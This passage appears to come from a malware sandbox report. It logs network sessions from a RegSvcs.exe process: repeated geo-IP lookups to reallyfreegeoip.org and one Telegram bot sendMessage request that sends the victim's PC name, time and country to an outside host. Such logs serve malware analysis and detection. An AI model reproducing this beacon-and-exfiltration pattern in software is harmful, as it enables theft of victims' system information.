                                                                          2024-09-19 10:21:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.549710188.114.97.34431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:12 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          2024-09-19 10:21:12 UTC704INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:12 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15028
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jA5saEKGMxQe3uMzjFMaA6rv5jPrnE3DhlljefBW5TcVVLvyyNqmNNLsNDQPxcWNHmPM2EVACZSqwqPGlSFXpm6k2YZFQd%2BRs4ayvt4SRCmUo%2F5KVDPOMVtfIqvBkQKeIx8rEOLB"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d8f9594415c3-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.549712188.114.97.34431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:14 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:21:14 UTC704INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:14 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15030
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HkEVjIQ5N%2FXLL9ecJZXGLsEv46bfez7C6rfO8DwzS53nJohSVV92bB8MwdwDIZuslRCpdD181nThe3W1jrtvqOZBK6gFSefhW9TaphoNUadnx2QKUcB8xKx7VSC%2FaSD8SacodcvI"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d9037a3641de-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:14 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.549714188.114.97.34431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:15 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:21:15 UTC708INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:15 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15031
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qFKyWtqzp9kTAO5mXKkOI4IoPdm7HV6aNrdJkubp%2Fe0pwWGgNnvCEu3%2Fkkt%2FGIVpyAOSJpLQ5%2BVN13U4AAJ5ocrSm9xypdsSe7QO5iLPzaavZPY64iWOC7j39UZM2sKRhJrlSykI"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d90bcdf91861-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:15 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.549716188.114.97.34431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:16 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          2024-09-19 10:21:16 UTC704INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:16 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15032
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vzlGvix4I%2B6ue5Go0TJXQW5usN65P3PDV1y1VljfVwMlBZHTKakfFRB8kCp9T3MIcIj1Vmut7xNscVNBqISZHV3eOFPhgnfXupqHskUIQJujuDK7Y1N%2Fd9rVOUq6h9HP9VcHcLc8"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d913fbb442f7-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.549718188.114.97.34431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:17 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:21:18 UTC706INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:18 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15034
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h6WrDumkUtRwOS8YUP2zPDH9aTaiCNN4StwCmkYAmFNxNaEeVH4r%2FufeHigV2b4KkKODTw1gx4t868%2FmsDVA7kWQJ5x8u76BGIo19x1hP1m7AYdOAgHXZBvIAh%2Bl2jGHCp1WjmV8"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d91bfa64421d-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:18 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.549721188.114.97.34431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:19 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          2024-09-19 10:21:19 UTC706INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:19 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15035
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pawgnqt7m6026dRS%2FGGb7zzUgYet7ZJ2bpzarju3tgvN%2FKUxYuWCP3bWf%2Bfi32DTkuZ6wPcakUOIbihMx5jY1eO0yxbKkqF18UvOvaxzUEioSpAyMvOQWD2pzuYvzVqfYr8sKEsT"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d925cc034267-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.549722188.114.97.34435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:20 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:21:20 UTC712INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:20 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15036
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EJZGUxSLkjFF7Q6CoU6ah%2FV0YXQYbuQTtehbL0w770KDNsPB8%2FBx%2BRz0gqcjVLz%2BlV2%2BHkhfa2UL1hlBs64Y0Cq%2Ba14aOiMjFO7AdqIsGgpmVpJXtslNaGeVfqcnPsbO3TYx03M6"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d928f82380d3-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:20 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.549724149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:20 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2019/09/2024%20/%2018:25:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                          Host: api.telegram.org
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:21:20 UTC344INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:21:20 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 55
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:21:20 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.549726188.114.97.34435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:21 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          2024-09-19 10:21:21 UTC714INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:21 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15037
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q3HfqClCSDutT3iIVMDhBlXV%2F3o8d%2F6RpaBqk2Tsl9Ljn4FrgxlAx0NhfJchLOOqlCWqKZvKeT%2FkrMgVtw1X%2BvtfSljcWI9qt35v6XYt%2Fjq0I%2B00Wh9ZHMXcvzXhxYKkkrZEZY%2F5"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d933daf117fd-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.549729188.114.97.34435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:23 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          2024-09-19 10:21:23 UTC714INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:23 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15039
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eq%2B0xPPNyxGrogH8oUXVfIuJUd%2B88jsMXkTh3zbzeHGnzZSznFaMEFlhpndGPS%2B9JGZ6y%2F8ui9ZOR%2BY0i59SykavzGE9cR74uOfPD4hf2GQEYE82vpFYVaLXH%2BPWevDt%2FRpUZDkQ"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d93e8d5c43f8-EWR
                                                                          alt-svc: h3=":443"; ma=86400
